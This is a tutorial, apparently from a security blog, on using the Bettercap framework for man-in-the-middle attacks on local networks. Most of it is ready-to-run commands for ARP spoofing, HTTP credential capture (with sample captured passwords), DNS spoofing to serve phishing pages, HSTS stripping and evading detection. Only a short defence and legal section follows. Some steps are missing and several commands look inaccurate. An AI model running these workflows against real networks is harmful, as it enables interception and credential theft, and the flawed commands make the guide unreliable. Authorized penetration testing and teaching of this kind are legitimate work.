Introduction
Bettercap is the modern, modular framework for man-in-the-middle (MITM) attacks and network interception. It replaces outdated tools like ettercap with a more powerful, flexible architecture. Whether you’re conducting authorized network penetration testing or learning about network security, Bettercap enables credential capture, traffic interception, and protocol manipulation on local networks.
What Is Bettercap?
Bettercap is a modular, portable, and easily extensible MITM framework and network attack tool. It provides capabilities for ARP spoofing, DNS spoofing, SSL stripping, credential capture, and session hijacking—all from a unified command-line interface or interactive prompt.
Key Features
- ARP spoofing for network MITM positioning
- DNS spoofing for domain redirection
- HTTP/HTTPS interception and modification
- Credential capture from HTTP, FTP, IMAP, and other protocols
- Session hijacking and cookie theft
- Network reconnaissance and mapping
- Custom module development for advanced attacks
- REST API for integration with other tools
Prerequisites and Installation
System Requirements
- Linux system (Debian/Ubuntu, Fedora, Arch recommended)
- Root/sudo privileges
- Wireless adapter (for wireless attacks)
- Go 1.11+ for compiling from source
Install on Ubuntu/Debian
sudo apt update
sudo apt install bettercap libpcap-dev libnetfilter-queue-dev
Install on Fedora
sudo dnf install bettercap libpcap-devel libnetfilter_queue-devel
Verify Installation
bettercap -h
Network Basics: ARP Spoofing Fundamentals
Before running attacks, understand the mechanism. ARP (Address Resolution Protocol) maps IP addresses to MAC addresses. Spoofing ARP packets allows Bettercap to intercept traffic meant for other hosts.
How ARP Spoofing Works
Victim: 192.168.1.100
Gateway: 192.168.1.1
Attacker: 192.168.1.50 (MAC: AA:BB:CC:DD:EE:FF)
Attack:
Attacker sends ARP: "I am 192.168.1.1" (with attacker's MAC)
Victim believes attacker is the gateway
All traffic flows through attacker's machine
Starting Bettercap
Interactive Mode
sudo bettercap
This launches the interactive prompt where you can issue commands.
Command-Line Mode
Run specific attacks directly:
sudo bettercap -iface eth0 -targets "192.168.1.100" -probe
Fundamental Commands and Modules
Reconnaissance
List network interfaces:
> net.show
Probe the network for hosts:
> net.probe on
Wait 30 seconds for discovery, then:
> net.show
This reveals all active hosts on your local network.
Enable Packet Capture
Before performing MITM attacks, enable the sniffer:
> set net.sniff.verbose true
This shows captured traffic in real-time.
ARP Spoofing Attack Workflow
Step 1: Identify Targets
> net.probe on
> net.show
Note the IP and MAC address of your target and the gateway.
> set arp.spoof.targets 192.168.1.100
> set arp.spoof.gateway 192.168.1.1
Step 3: Enable ARP Spoofing
> arp.spoof on
Your machine now intercepts traffic between the target and gateway.
Step 4: Monitor Captured Traffic
> net.sniff on
The console shows HTTP requests, DNS queries, and other unencrypted data passing through your machine.
Step 5: Stop the Attack
> arp.spoof off
This restores normal network function (critical for ethical operation).
Credential Capture with HTTP Sniffer
Enable HTTP Sniffer
> http.proxy on
> set http.proxy.port 8080
> http.proxy on
The HTTP proxy module captures HTTP credentials:
> set http.proxy.sniffer true
Observe Captured Credentials
When targets browse HTTP sites, credentials appear in the Bettercap output:
[12:34:56] [HTTP.SNIFFER] POST to 192.168.1.100:80
Username: admin
Password: password123
DNS Spoofing Attacks
> set dns.spoof.domains example.com
> set dns.spoof.all false
Step 2: Enable DNS Spoofing
> dns.spoof on
This redirects requests for example.com to your machine.
Step 3: Set Up Fake Web Server
Create a simple HTTP server to serve phishing pages:
# In another terminal
python3 -m http.server 80
Place phishing HTML in the current directory.
SSL Stripping (HTTPS Downgrade)
> set hsts.spoof true
> set net.sniff.verbose true
Enable the SSL stripper module:
> caplets.show
> caplets.load hsts
This strips HSTS headers, allowing downgrade of HTTPS to HTTP in some scenarios.
Advanced Bettercap Techniques
Multiple Targets
Spoof multiple hosts simultaneously:
> set arp.spoof.targets 192.168.1.100,192.168.1.101,192.168.1.102
> arp.spoof on
Whitelist Protection
Prevent spoofing specific hosts:
> set arp.spoof.whitelist 192.168.1.1
Bandwidth Control
Limit bandwidth to prevent detection:
> set net.traffic.monitor.rate 0.01
Packet Injection
Modify and inject custom packets using custom modules (advanced):
> module.load /path/to/custom_module.go
Using Caplets for Automation
Caplets are Bettercap automation scripts. Load pre-built attack scenarios:
> caplets.show
> caplets.load beef
This loads a caplet that integrates with the BeEF framework.
Real-World Attack Scenario
Complete Credential Capture Workflow
sudo bettercap
# 1. Discover hosts
> net.probe on
> net.show
# 2. Configure targets
> set arp.spoof.targets 192.168.1.100
> set arp.spoof.gateway 192.168.1.1
# 3. Enable spoofing
> arp.spoof on
# 4. Enable HTTP interception
> http.proxy on
> set http.proxy.sniffer true
# 5. Monitor
> net.sniff on
# 6. Wait for requests
# [Monitor output for credentials]
# 7. Stop attack
> arp.spoof off
> http.proxy off
Network Defense: Detecting and Preventing MITM
Detection Indicators
- ARP anomalies or duplicate MAC addresses
- Unexpected changes to default gateway MAC
- Network monitoring tools alerting on unusual traffic patterns
- Certificate warnings on HTTPS sites
Prevention Measures
- Use HTTPS everywhere (prevents SSL stripping)
- Enable static ARP entries on critical hosts
- Deploy ARP monitoring tools
- Segment networks to limit MITM impact
- Use VPN for sensitive traffic
Legal and Ethical Guidelines
Required Authorization
- Only perform MITM attacks on networks you own or have written permission to test
- Unauthorized network interception is illegal under wiretapping and computer fraud laws
- Document all authorization in writing
- Maintain clear scope of engagement
Responsible Practice
- Test on isolated lab networks first
- Use credentials and data only for authorized purposes
- Disable attacks immediately after testing
- Report findings professionally and confidentially
- Never access or steal personal data
Troubleshooting Common Issues
ARP Spoof Not Working
# Verify IP forwarding is enabled
sudo sysctl -w net.ipv4.ip_forward=1
# Check interface is correct
> net.show
# Verify you have root privileges
sudo bettercap
No Traffic Captured
- Verify targets are actively communicating
- Check that ARP spoofing is actually enabled
- Confirm you’re targeting the correct IP addresses
- Ensure network interface is on the same subnet
Connection Instability
- Reduce the number of simultaneous targets
- Check for conflicting network tools
- Verify gateway connectivity
- Monitor system resource usage
Conclusion
Bettercap transforms network-level attack capabilities into an accessible, modular framework. By mastering ARP spoofing, DNS manipulation, and credential capture, you’ll understand critical network vulnerabilities. However, these capabilities demand strict ethical discipline—use Bettercap only for authorized testing on networks where you have explicit written permission. Start with isolated lab environments, progress to authorized penetration tests, and always prioritize responsible disclosure and network safety.